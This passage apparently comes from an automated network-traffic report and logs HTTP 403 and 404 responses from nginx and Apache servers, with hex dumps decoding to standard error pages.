3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 38 65 6d 3b 22 3e 0a 20 20 20 59 6f 75 72 20 62 72 6f 77 73 65 72 20 63 61 6e 27 74 20 66 69 6e 64 20 74 68 65 20 64 6f 63 75 6d 65 6e 74 20 63 6f 72 72 65 73 70 6f 6e 64 69 6e 67 20 74 6f 20 74 68 65 20 55 52 4c 20 79 6f 75 20 74 79 70 65 64 20 69 6e 2e 0a 20 20 3c 2f 70 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Your browser can't find the document corresponding to the URL you typed in. </p> </body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Sat, 02 Dec 2023 17:48:43 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"64f9f107-377d8"Content-Encoding: gzipData Raw: 36 30 30 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec bd ef 8e db 48 b2 2f f8 7d 9e 42 a5 83 b6 a5 31 a5 e2 7f 52 92 e9 9a 9e 1e f7 99 c6 99 9e 6e 8c fb f4 60 51 63 08 2c 89 2a b1 4d 89 ba 24 55 e5 72 b9 0e ee dd 27 d9 af fb ed ec 05 16 d8 c5 ee de 05 f6 09 e6 bc d1 46 44 92 14 ff 4a 49 51 e5 6a fb 4c 75 5b a2 c8 cc 88 cc c8 c8 c8 5f 44 06 c9 97 67 73 7f 16 dd 6d 9c ce 32 5a 79 af 5e e2 67 c7 b3 d7 d7 56 d7 59 77 e1 b7 63 cf 5f bd 5c 39 91 dd 99 2d ed 20 74 22 ab fb af 3f 7d 3b 30 e1 5a e4 46 9e f3 ea ef ff cb df ff fd ef ff db df ff c7 7f fc cf 7f ff f7 ce 7f fc 37 f8 f1 7f d2 e1 df ff fb 7f fc d7 bf ff ef 7f ff bf e1 df ff 03 ff fd 8f ce df ff 5f 38 f1 7f 40 c1 ff 86 d7 f1 d4 df ff fb df ff 2f ba fc ef 2f cf 19 b1 97 61 74 e7 39 9d 95 33 77 6d ab 6b 7b 5e f7 d5 f9 6f cf 7e fb b9 ff 9d fd f6 6f bf e9 74 b0 1f 9d 59 18 76 86 e7 6b 7f ee 4c 57 fe 7c eb 39 e1 39 9c 1a 78 be 3d 77 82 73 77 3d 77 de 0f 7f 09 2f 2e 66 9e bf 76 e6 7f 81 02 6f 9c 68 a0 0f b7 a1 73 29 bd 3d 2b 54 dd f8 61 94 a9 1e 06 b3 94 44 b1 28 fc 4b cb cd dd 30 3a 9f fd 12 b2 62 57 ce ea fc ca f3 67 ef c2 a1 3d b7 37 91 7b e3 9c 5f 0d 36 f6 75 f2 35 c4 ba 1d ec 07 f4 e2 6f 4f 2d cc d6 7f e7 bf 19 b2 7e dd 83 1c 36 9e 7d 37 5e 78 ce fb 09 7e 0c e6 6e e0 cc 22 d7 5f 8f 67 be b7 5d ad 27 b7 ee 3c 5a 8e 25 51 fc 6a b2 72 d7 03 f6 53 91 c5 cd fb c9 d2 71 af 97 11 bb b6 b1 e7 73 77 7d 3d d6 8c cd fb 8e d8 11 27 2b 3b b8 76 d7 63 71 02 74 fc 60 fc 4f 8a ae c2 ff 93 85 bf 86 1a 32 14 fa 6e 1d 39 81 f0 75 e0 da 9e f0 47 c7 bb 71 22 77 66 77 fe ec 6c 9d dd 4f e1 db c0 71 de d8 eb 50 08 e1 63 10 3a 81 bb 98 5c d9 b3 77 d7 81 bf 5d cf c7 ff b4 58 2c 26 83 5b e7 ea 9d 1b 0d 22 7b 33 58 42 8b 3c 6c d5 80 b1 8d 02 a8 b7 b1 03 67 1d 3d e0 d4 1e af fd a8 37 74 c3 69 32 d0 fd 4e 22 0b ff c6 09 16 9e 7f 3b 78 3f 5e ba f3 b9 b3 7e f8 1d 4d c3 4e 6f d7 6f 49 94 d5 cd fb fe 7d 96 c2 1e 02 0f f1 a5 29 1a 98 29 34 e3 1d 88 e8 1e c9 ed 44 77 b3 cc 97 72 82 c0 0f 18 c1 44 a6 e2 81 a6 4f 57 ce 7a 3b c0 c2 38 70 70 7d ee cc 85 e6 55 06 f6 0c cb 24 6c 07 91 bf 01 d6 cd 84 50 45 b7 40 f0 a1 61 13 24 d4 b5 13 34 a3 ba 7b 87 b4 22 57 3a 33 03 46 23 1d 5a 75 40 c8 70 c5 5d dc 0d ae 02 ff 16 54 77 7a e3 86 ee 95 97 a7 a9 a9 8d 3b 77 a0 4d 95 f2 e0 6d c9 6e 70 fc 2b d7 73 06 89 4e 4f 99 46 0b c9 e5 70 7b 85 22 9e fa 1b 07 ac 74 aa fa 89 e2 1f 90 cb 74 e1 fb 30 f9 07 73 ff 76 7d 50 51 ab 1b 72 a0 56 5d fb e2 8e 37 55 a7 43 e4 1a ab 67 65 a7 2a e8 0e dd dd b0 27 c6 9a 96 aa 87 2a 59 de a3 09 1f 4b 60 7f ed 6d e4 4f 8a a3 92 21 96 af 96 b7 48 5f 35 ed 4d 8e 56 45 1f 2a 8a 4d d3 ae 27 aa 58 aa 57 ac 06 9d a8 66 09 a6 1e 96 92 75 94 6a f3 95 1f 45 fe 0a 26 77 1d 09 f6 33 15 e8 1a 90 c6 ae 6c 4c 6d 70 1b d8 9b 0d 94 4a 16 32 92 69 6d b1 29 01 b7 29 82 8f 4c 4b 02 92 29 8a 2e 59 20 07 9e b3 60 67 f8
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Sat, 02 Dec 2023 17:48:46 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"64f9f107-377d8"Content-Encoding: gzipData Raw: 36 30 30 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec bd ef 8e db 48 b2 2f f8 7d 9e 42 a5 83 b6 a5 31 a5 e2 7f 52 92 e9 9a 9e 1e f7 99 c6 99 9e 6e 8c fb f4 60 51 63 08 2c 89 2a b1 4d 89 ba 24 55 e5 72 b9 0e ee dd 27 d9 af fb ed ec 05 16 d8 c5 ee de 05 f6 09 e6 bc d1 46 44 92 14 ff 4a 49 51 e5 6a fb 4c 75 5b a2 c8 cc 88 cc c8 c8 c8 5f 44 06 c9 97 67 73 7f 16 dd 6d 9c ce 32 5a 79 af 5e e2 67 c7 b3 d7 d7 56 d7 59 77 e1 b7 63 cf 5f bd 5c 39 91 dd 99 2d ed 20 74 22 ab fb af 3f 7d 3b 30 e1 5a e4 46 9e f3 ea ef ff cb df ff fd ef ff db df ff c7 7f fc cf 7f ff f7 ce 7f fc 37 f8 f1 7f d2 e1 df ff fb 7f fc d7 bf ff ef 7f ff bf e1 df ff 03 ff fd 8f ce df ff 5f 38 f1 7f 40 c1 ff 86 d7 f1 d4 df ff fb df ff 2f ba fc ef 2f cf 19 b1 97 61 74 e7 39 9d 95 33 77 6d ab 6b 7b 5e f7 d5 f9 6f cf 7e fb b9 ff 9d fd f6 6f bf e9 74 b0 1f 9d 59 18 76 86 e7 6b 7f ee 4c 57 fe 7c eb 39 e1 39 9c 1a 78 be 3d 77 82 73 77 3d 77 de 0f 7f 09 2f 2e 66 9e bf 76 e6 7f 81 02 6f 9c 68 a0 0f b7 a1 73 29 bd 3d 2b 54 dd f8 61 94 a9 1e 06 b3 94 44 b1 28 fc 4b cb cd dd 30 3a 9f fd 12 b2 62 57 ce ea fc ca f3 67 ef c2 a1 3d b7 37 91 7b e3 9c 5f 0d 36 f6 75 f2 35 c4 ba 1d ec 07 f4 e2 6f 4f 2d cc d6 7f e7 bf 19 b2 7e dd 83 1c 36 9e 7d 37 5e 78 ce fb 09 7e 0c e6 6e e0 cc 22 d7 5f 8f 67 be b7 5d ad 27 b7 ee 3c 5a 8e 25 51 fc 6a b2 72 d7 03 f6 53 91 c5 cd fb c9 d2 71 af 97 11 bb b6 b1 e7 73 77 7d 3d d6 8c cd fb 8e d8 11 27 2b 3b b8 76 d7 63 71 02 74 fc 60 fc 4f 8a ae c2 ff 93 85 bf 86 1a 32 14 fa 6e 1d 39 81 f0 75 e0 da 9e f0 47 c7 bb 71 22 77 66 77 fe ec 6c 9d dd 4f e1 db c0 71 de d8 eb 50 08 e1 63 10 3a 81 bb 98 5c d9 b3 77 d7 81 bf 5d cf c7 ff b4 58 2c 26 83 5b e7 ea 9d 1b 0d 22 7b 33 58 42 8b 3c 6c d5 80 b1 8d 02 a8 b7 b1 03 67 1d 3d e0 d4 1e af fd a8 37 74 c3 69 32 d0 fd 4e 22 0b ff c6 09 16 9e 7f 3b 78 3f 5e ba f3 b9 b3 7e f8 1d 4d c3 4e 6f d7 6f 49 94 d5 cd fb fe 7d 96 c2 1e 02 0f f1 a5 29 1a 98 29 34 e3 1d 88 e8 1e c9 ed 44 77 b3 cc 97 72 82 c0 0f 18 c1 44 a6 e2 81 a6 4f 57 ce 7a 3b c0 c2 38 70 70 7d ee cc 85 e6 55 06 f6 0c cb 24 6c 07 91 bf 01 d6 cd 84 50 45 b7 40 f0 a1 61 13 24 d4 b5 13 34 a3 ba 7b 87 b4 22 57 3a 33 03 46 23 1d 5a 75 40 c8 70 c5 5d dc 0d ae 02 ff 16 54 77 7a e3 86 ee 95 97 a7 a9 a9 8d 3b 77 a0 4d 95 f2 e0 6d c9 6e 70 fc 2b d7 73 06 89 4e 4f 99 46 0b c9 e5 70 7b 85 22 9e fa 1b 07 ac 74 aa fa 89 e2 1f 90 cb 74 e1 fb 30 f9 07 73 ff 76 7d 50 51 ab 1b 72 a0 56 5d fb e2 8e 37 55 a7 43 e4 1a ab 67 65 a7 2a e8 0e dd dd b0 27 c6 9a 96 aa 87 2a 59 de a3 09 1f 4b 60 7f ed 6d e4 4f 8a a3 92 21 96 af 96 b7 48 5f 35 ed 4d 8e 56 45 1f 2a 8a 4d d3 ae 27 aa 58 aa 57 ac 06 9d a8 66 09 a6 1e 96 92 75 94 6a f3 95 1f 45 fe 0a 26 77 1d 09 f6 33 15 e8 1a 90 c6 ae 6c 4c 6d 70 1b d8 9b 0d 94 4a 16 32 92 69 6d b1 29 01 b7 29 82 8f 4c 4b 02 92 29 8a 2e 59 20 07 9e b3 60 67 f8
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Sat, 02 Dec 2023 17:48:49 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"64f9f107-377d8"Content-Encoding: gzipData Raw: 36 30 30 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec bd ef 8e db 48 b2 2f f8 7d 9e 42 a5 83 b6 a5 31 a5 e2 7f 52 92 e9 9a 9e 1e f7 99 c6 99 9e 6e 8c fb f4 60 51 63 08 2c 89 2a b1 4d 89 ba 24 55 e5 72 b9 0e ee dd 27 d9 af fb ed ec 05 16 d8 c5 ee de 05 f6 09 e6 bc d1 46 44 92 14 ff 4a 49 51 e5 6a fb 4c 75 5b a2 c8 cc 88 cc c8 c8 c8 5f 44 06 c9 97 67 73 7f 16 dd 6d 9c ce 32 5a 79 af 5e e2 67 c7 b3 d7 d7 56 d7 59 77 e1 b7 63 cf 5f bd 5c 39 91 dd 99 2d ed 20 74 22 ab fb af 3f 7d 3b 30 e1 5a e4 46 9e f3 ea ef ff cb df ff fd ef ff db df ff c7 7f fc cf 7f ff f7 ce 7f fc 37 f8 f1 7f d2 e1 df ff fb 7f fc d7 bf ff ef 7f ff bf e1 df ff 03 ff fd 8f ce df ff 5f 38 f1 7f 40 c1 ff 86 d7 f1 d4 df ff fb df ff 2f ba fc ef 2f cf 19 b1 97 61 74 e7 39 9d 95 33 77 6d ab 6b 7b 5e f7 d5 f9 6f cf 7e fb b9 ff 9d fd f6 6f bf e9 74 b0 1f 9d 59 18 76 86 e7 6b 7f ee 4c 57 fe 7c eb 39 e1 39 9c 1a 78 be 3d 77 82 73 77 3d 77 de 0f 7f 09 2f 2e 66 9e bf 76 e6 7f 81 02 6f 9c 68 a0 0f b7 a1 73 29 bd 3d 2b 54 dd f8 61 94 a9 1e 06 b3 94 44 b1 28 fc 4b cb cd dd 30 3a 9f fd 12 b2 62 57 ce ea fc ca f3 67 ef c2 a1 3d b7 37 91 7b e3 9c 5f 0d 36 f6 75 f2 35 c4 ba 1d ec 07 f4 e2 6f 4f 2d cc d6 7f e7 bf 19 b2 7e dd 83 1c 36 9e 7d 37 5e 78 ce fb 09 7e 0c e6 6e e0 cc 22 d7 5f 8f 67 be b7 5d ad 27 b7 ee 3c 5a 8e 25 51 fc 6a b2 72 d7 03 f6 53 91 c5 cd fb c9 d2 71 af 97 11 bb b6 b1 e7 73 77 7d 3d d6 8c cd fb 8e d8 11 27 2b 3b b8 76 d7 63 71 02 74 fc 60 fc 4f 8a ae c2 ff 93 85 bf 86 1a 32 14 fa 6e 1d 39 81 f0 75 e0 da 9e f0 47 c7 bb 71 22 77 66 77 fe ec 6c 9d dd 4f e1 db c0 71 de d8 eb 50 08 e1 63 10 3a 81 bb 98 5c d9 b3 77 d7 81 bf 5d cf c7 ff b4 58 2c 26 83 5b e7 ea 9d 1b 0d 22 7b 33 58 42 8b 3c 6c d5 80 b1 8d 02 a8 b7 b1 03 67 1d 3d e0 d4 1e af fd a8 37 74 c3 69 32 d0 fd 4e 22 0b ff c6 09 16 9e 7f 3b 78 3f 5e ba f3 b9 b3 7e f8 1d 4d c3 4e 6f d7 6f 49 94 d5 cd fb fe 7d 96 c2 1e 02 0f f1 a5 29 1a 98 29 34 e3 1d 88 e8 1e c9 ed 44 77 b3 cc 97 72 82 c0 0f 18 c1 44 a6 e2 81 a6 4f 57 ce 7a 3b c0 c2 38 70 70 7d ee cc 85 e6 55 06 f6 0c cb 24 6c 07 91 bf 01 d6 cd 84 50 45 b7 40 f0 a1 61 13 24 d4 b5 13 34 a3 ba 7b 87 b4 22 57 3a 33 03 46 23 1d 5a 75 40 c8 70 c5 5d dc 0d ae 02 ff 16 54 77 7a e3 86 ee 95 97 a7 a9 a9 8d 3b 77 a0 4d 95 f2 e0 6d c9 6e 70 fc 2b d7 73 06 89 4e 4f 99 46 0b c9 e5 70 7b 85 22 9e fa 1b 07 ac 74 aa fa 89 e2 1f 90 cb 74 e1 fb 30 f9 07 73 ff 76 7d 50 51 ab 1b 72 a0 56 5d fb e2 8e 37 55 a7 43 e4 1a ab 67 65 a7 2a e8 0e dd dd b0 27 c6 9a 96 aa 87 2a 59 de a3 09 1f 4b 60 7f ed 6d e4 4f 8a a3 92 21 96 af 96 b7 48 5f 35 ed 4d 8e 56 45 1f 2a 8a 4d d3 ae 27 aa 58 aa 57 ac 06 9d a8 66 09 a6 1e 96 92 75 94 6a f3 95 1f 45 fe 0a 26 77 1d 09 f6 33 15 e8 1a 90 c6 ae 6c 4c 6d 70 1b d8 9b 0d 94 4a 16 32 92 69 6d b1 29 01 b7 29 82 8f 4c 4b 02 92 29 8a 2e 59 20 07 9e b3 60 67 f8
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Sat, 02 Dec 2023 17:48:51 GMTContent-Type: text/htmlContent-Length: 227288Connection: closeVary: Accept-EncodingETag: "64f9f107-377d8"Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e d0 a0 d0 b0 d0 b1 d0 be d1 82 d0 b0 20 d1 81 d0 b0 d0 b9 d1 82 d0 b0 20 d0 b2 d1 80 d0 b5 d0 bc d0 b5 d0 bd d0 bd d0 be 20 d0 bf d1 80 d0 b8 d0 be d1 81 d1 82 d0 b0 d0 bd d0 be d0 b2 d0 bb d0 b5 d0 bd d0 b0 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6d 65 64 69 61 3d 22 61 6c 6c 22 3e 2f 2a 21 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 21 2a 5c 0a 20 20 21 2a 2a 2a 20 63 73 73 20 2e 2f 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 2f 63 73 73 2d 6c 6f 61 64 65 72 2f 69 6e 64 65 78 2e 6a 73 3f 3f 63 6c 6f 6e 65 64 52 75 6c 65 53 65 74 2d 36 2e 75 73 65 5b 31 5d 21 2e 2f 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 2f 70 6f 73 74 63 73 73 2d 6c 6f 61 64 65 72 2f 73 72 63 2f 69 6e 64 65 78 2e 6a 73 21 2e 2f 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 2f 6c 65 73 73 2d 6c 6f 61 64 65 72 2f 64 69 73 74 2f 63 6a 73 2e 6a 73 21 2e 2f 62 65 6d 2f 62 6c 6f 63 6b 73 2e 61 64 61 70 74 69 76 65 2f 62 2d 70 61 67 65 2f 62 2d 70 61 67 65 2e 6c 65 73 73 20 2a 2a 2a 21 0a 20 20 5c 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2f 0a 2e 62 2d 70 61 67 65 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 3b 77 69 64 74 68 3a 31 30 30 25 3b 6d 69 6e 2d 77 69 64 74 68 3a 33 32 30 70 78 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 70 61 64 64 69 6e 67 3a 35 37 70 78 20 30 20 30 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 33 36 34 33 36 34 3b 66 6f 6e 74 3a 31 32 70 78 20 49 6e 74 65 72 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 48 65 6c 76 65 74 69 63 61 2c 46 72 65 65 53 61
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 02 Dec 2023 17:48:59 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 02 Dec 2023 17:49:01 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 02 Dec 2023 17:49:04 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 02 Dec 2023 17:49:06 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Sat, 02 Dec 2023 17:49:20 GMTContent-Type: text/htmlContent-Length: 178Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>
